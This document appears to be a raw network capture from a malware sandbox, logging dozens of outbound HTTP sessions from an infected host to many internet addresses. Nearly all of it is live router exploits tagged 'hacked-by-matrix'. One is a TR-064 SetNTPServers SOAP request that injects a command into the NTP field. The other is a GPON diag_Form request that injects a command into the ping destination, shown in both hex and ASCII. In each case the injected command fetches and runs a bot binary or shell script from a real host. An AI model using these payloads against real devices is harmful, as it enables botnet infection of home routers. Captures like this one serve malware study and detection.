                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        353192.168.2.134011212.110.11.657547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.903213978 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        354192.168.2.135665646.159.48.1957547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.076858044 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:15.629439116 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:15.874593973 CET125INHTTP/1.0 501 Not Implemented
                                                        Content-type: text/html
                                                        Date: Sat, 03 Jan 1970 16:44:48 GMT
                                                        Connection: close
                                                        Mar 21, 2024 05:22:18.676832914 CET125INHTTP/1.0 501 Not Implemented
                                                        Content-type: text/html
                                                        Date: Sat, 03 Jan 1970 16:44:48 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        355192.168.2.134015412.110.11.657547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.077203989 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        356192.168.2.1348576141.164.173.1377547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.125571012 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:15.276297092 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:16.620263100 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:19.312256098 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:24.687271118 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:35.437388897 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:57.968262911 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:40.976242065 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        357192.168.2.1350298102.157.201.1787547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.131391048 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        358192.168.2.1348586141.164.173.1377547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.346043110 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:15.500267982 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:16.844257116 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:19.564248085 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:24.940256119 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:35.692305088 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:57.968255043 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:40.976207972 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        359192.168.2.1350308102.157.201.1787547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.357805014 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        360192.168.2.1333978109.218.220.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503787994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        361192.168.2.13508965.158.42.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503801107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        362192.168.2.1359680212.52.100.148443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503813982 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        363192.168.2.1349238109.221.254.220443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503823996 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        364192.168.2.136086242.0.108.250443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503833055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
